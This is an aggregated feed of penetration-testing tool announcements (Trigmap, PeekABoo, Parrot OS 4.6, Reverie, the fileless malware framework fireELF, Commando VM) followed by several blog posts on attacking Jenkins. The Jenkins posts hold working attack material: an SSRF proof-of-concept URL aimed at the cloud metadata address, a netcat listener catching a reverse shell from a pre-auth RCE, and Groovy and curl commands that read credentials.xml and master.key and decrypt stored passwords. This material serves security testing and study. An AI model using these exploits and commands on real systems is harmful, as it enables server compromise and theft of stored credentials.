Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.DetailsTrigmap can performs several tasks using Nmap scripting engine (NSE):Port ScanService and Version DetectionWeb Resources EnumerationVulnerability AssessmentCommon Vulnerabilities TestCommon Exploits TestDictionary Attacks Against Active ServicesDefault Credentials TestUsageTrigmap can be used in two ways:Interactive mode:trigmap [ENTER], and the script does the restNON-interactive mode:trigmap -h|–host [-tp|–tcp TCP ports] [-up|–udp UDP ports] [-f|–file file path] [-s|–speed time profile] [-n|–nic NIC] [-p|–phase phases]If you want to see the help: trigmap –help to print this helperFor more screenshots see the relative directory of the repository.Dir HierarchyCustomizationIt’s possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).################################################# PARAMETERS #################################################GENERAL_USER_LIST=’general_user_wordlist_short.txt’WIN_USER_LIST=’win_user_wordlist_short.txt’UNIX_USER_LIST=’unix_user_wordlist_short.txt’SHORT_PASS_LIST=’fasttrack.txt’LONG_PASS_LIST=’rockyou.txt’################################################# NMAP SETTING ################################################## PE (echo req), PP (timestamp-request)# you can add a port on every ping scanNMAP_PING=’-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445’NMAP_OTHER=’-sV –allports -O –fuzzy –min-hostgroup 256’SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)’SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)’SCRIPT_ARGS=”userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST"CUSTOM_SCAN=’–max-retries 3 –min-rate 250′ # LIKE UNICORNSCANTwin BrotherThis project is very similar to Kaboom, but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the portability and the efficient, but it’s recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools (redundancy and reliability).Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo tool can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.The tool only works if WinRM is enabled. Since Windows Server 2012 WinRM is enabled by default on all Windows server operating systems, but not on client operating systems.Note: Remote desktop is disabled by default on all Windows operating systems. User would require local administrator password or administrator privileges on the server to enable RDP on a targeted machine.ScreenshotsTargeted machine on an internal network has RDP disabled:Enabling remote desktop service on a targeted machine by pressing option 2:Successfully enabled remote desktop service on a targeted machine:How to install?- git clone https://github.com/Viralmaniar/PeekABoo.git- cd PeekABoo- python peekaboo.pyHow do I use this?Press 1: This will set the PowerShell to unrestricted mode.Press 2: It enables the Remote Desktop on the targeted machine and shows the RDP port (3389) status.Press 3: It disables the Remote Desktop on the targeted machine.Press 4: To exit from the program.My Windows machine does not have Python installed, what should I do? Download an exe from the release section of the Github along with PowerShell files available here or do it on your own using PyInstaller after reviewing the source code. Compile peekaboo.py into an executable using Pyinstaller PyInstaller is available on PyPI. You can install it through pip: pip install pyinstallerQuestions?Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniarDownload PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Parrot Security 4.6 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

 After 3 months of heavy development Parrot 4.6 is officially released.How to updateUpdate your existing Parrot system with the following command:sudo parrot-upgradeSystem Changes (Appearance)The desktop-base and parrot-wallpapers also received some love and are updated to reflect such changes including the new Parrot appearence.APT now enforces httpsParrot 4.6 is now configured to serve signed index files via https by default, and the mirror redirector is configured to redirect traffic to https mirrors when available. In case an https mirror is not available, the packages are downloaded by fallback http mirrors, but APT will still verify the signatures.In other debian-based systems and previous Parrot OS versions, mirrors used http by default, and https is just an exception. Http downloads don’t represent a security risk because gpg signatures are more effective than ssl downloads in certifying repository integrity, as described on this website – https://whydoesaptnotusehttps.com/.Although you can never eliminate risk of bad actors, we hope to increase the cost for providers attempting to intercept or track user activities (i.e. knowing if a user is installing specific software).Improved drivers supportParrot 4.6 includes the Linux 4.19 kernel which contains several security patches, performance improvements and a better hardware support.Moreover Parrot 4.6 features important updates for broadcom and other wireless chipset manufacturers, and the Nvidia drivers were updated to the latest 410 version with better Quadro support. Debian Kernel Changelog – Linux changelogAnonsurf has OpenNIC supportAnonsurf now integrates a new option to change from the system DNS servers to OpenNIC DNS resolvers.OpenNIC is a community-driven dns resolver provider that respects user freedom and allows domain resolution of some special top level domains.Download Parrot Security 4.6

Link: http://feedproxy.google.com/~r/PentestTools/~3/s2FArN4t_3o/parrot-security-46-security-gnulinux.html

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated Pentest Tools Designed For Parrot Linux.this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone~# git clone https://github.com/baguswiratmaadi/reverieGo Inside reverie Dir~# cd reverieGive Permission To reverie~# chmod 777 *.shRun reverie without install~# ./reverie.shIf you want to install reverie~# ./install.shChangelog1.0 First Release 1.1 Fixing Error In Nikto Command Line Pentest Tools Auto Executed With ReverieWhois LookupDNSwalkNmapDmitryWhatwebwafw00fLoad Balancing DetectorSSLyzeTLSSledAutomaterNiktoAnd More Tool SoonScreenshotthis is preview of Reverie Auto PentestTools Preview Output ResultReport In HTML DisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

fireELF – Fileless Linux Malware Framework

fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with ‘memfd_create’ which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.FeaturesChoose and build payloads.Ability to minify payloads.Ability to shorten payloads by uploading the payload source to a pastebin, it then creates a very small stager compatible with python <= 2.7 which allows for easy deployment.Output created payload to file.Ability to create payload from either a url or a local binary.Included payload memfd_createThe only included payload 'memfd_create' is based on the research of Stuart, this payload creates an anonymous file descriptor in memory it then uses fexecve to execute the binary directly from the file descriptor. This allows for the execution completely in memory which means that if the linux system gets restarted, the payload will be no where to be found.Creating a PayloadBy default fireELF comes with 'memfd_create' but users can develop their own payloads. By default the payloads are stored in payloads/ and in order to create a valid payload you simply need to include a dictonary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictonary is below:desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}In addition to the ‘desc’ dictonary the entry point the plugin engine i built uses requires a main function which will automatically get passed two parameters, one is a boolean that if its true it means its getting passed a url the second parameter it gets passed is the data. An example of a simple entry point is below:def main(is_url, url_or_payload): returnIf you have a method feel free to commit a payload!ScreenshotsInstallationDownload the dependencies by running:pip3 -U -r dep.txtfireELF is developed in Python 3.x.xUsageusage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME] (-u PAYLOAD_URL | -e EXECUTABLE_PATH)fireELF, Linux Fileless Malware Generatoroptional arguments: -h, –help show this help message and exit -s Supress Banner -p PAYLOAD_NAME Name of Payload to Use -w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if You’re not Using the Paste Site Option) -u PAYLOAD_URL Url of Payload to be Executed -e EXECUTABLE_PATH Location of ExecutableDownload fireELF

Link: http://feedproxy.google.com/~r/PentestTools/~3/nkiWxHsqM50/fireelf-fileless-linux-malware-framework.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.Installation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMInstructionsCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command:Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows:.\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Installing a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)Visual Studio 2017 Build Tools (Windows 10)Visual Studio CodeEvasionCheckPleaseDemiguiseDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPackRubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRulerSharpExchangePrivSpoolSampleUACMEimpacket-examples-windowsvssownInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHoundGet-ReconInfoGoWitnessNmapPowerViewDev branch includedSharpHoundSharpViewSpoolerScannerNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionPidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisEgress-AssessGrouper2zBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapWordlistsFuzzDBPayloadsAllTheThingsSecListsDownload Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

Jenkins – CVE-2018-1000600 PoC

second exploit from the blog posthttps://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.htmlChained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRFhttps://jenkins.io/security/advisory/2018-06-25/#SECURITY-915This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I’m honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.exploit works against: GitHub Plugin up to and including 1.29.1When i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.From the blog post:CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)Although it can’t extract any credentials without known credentials ID, there is still another attack primitive – a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!PoC:http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://169.254.169.254/%23&login=orange&password=tsaiTo get old versions of the plugin and info you can go to  https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugindownload old versionshttps://updates.jenkins.io/download/plugins/github-branch-source/https://updates.jenkins.io/download/plugins/github/

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html

Jenkins – messing with exploits pt3 – CVE-2019-1003000

References:https://www.exploit-db.com/exploits/46453http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.htmlThis post covers the Orange Tsai Jenkins pre-auth exploitVuln versions: Jenkins < 2.137 (preauth)Pipeline: Declarative Plugin up to and including 1.3.4Pipeline: Groovy Plugin up to and including 2.61Script Security Plugin up to and including 1.49  (in CG's testing 1.50 is also vuln)The exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.nc -l 8888 -vvwhoamibash: no job control in this shell bash-3.2$ jenkinsAfter Jenkins 2.138 the preauth is gone but if you have  an overall read token and the plugins are still vulnerable you can still exploit that server.  You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html

Jenkins – Identify IP Addresses of nodes

While doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.  You might want to know this if you read the decrypting credentials post and managed to get yourself some ssh keys for nodes but you cant actually see the node’s IP in the Jenkins UI.Stackoverflow link: https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-nodeblog on setting up a node: https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it’s pretty easy to get this information.You can just browse to jenkins-ip/computer/$nodename/config.xml. This request will require the extended read permission.Optionally if you are on the box  or have a backup you can go to jenkins-dir/nodes/$nodename/config.xml

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:hashed_pw=’$PASSWORDHASH’passwd = hudson.util.Secret.decrypt(hashed_pw)println(passwd)You need to perform this on the the Jenkins system itself as it’s using the local master.key and hudson.util.SecretScreenshot belowCode to get the credentials.xml from the script consoleWindowsdef sout = new StringBuffer(), serr = new StringBuffer()def proc = ‘cmd.exe /c type credentials.xml’.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println “out> $sout err> $serr"*nixdef sout = new StringBuffer(), serr = new StringBuffer()def proc = ‘cat credentials.xml’.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"If you just want to do it with curl you can hit the scriptText endpoint and do something like this:Windows:curl -u admin:admin http://10.0.0.160:8080/scriptText –data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"Also because this syntax took me a minute to figure out for files in subdirectories:curl -u admin:admin http://10.0.0.160:8080/scriptText –data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run*nixcurl -u admin:admin http://10.0.0.160:8080/scriptText –data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"Then to decrypt any passwords:curl -u admin:admin http://10.0.0.160:8080/scriptText –data "script=println(hudson.util.Secret.fromString(‘7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=’).getPlainText())"If you are in a position where you have the files but no access to jenkins you can use:https://github.com/tweksteen/jenkins-decryptThere is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i’m just printing out the values and you can see the decrypted password. The change is line 55.

Link: http://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html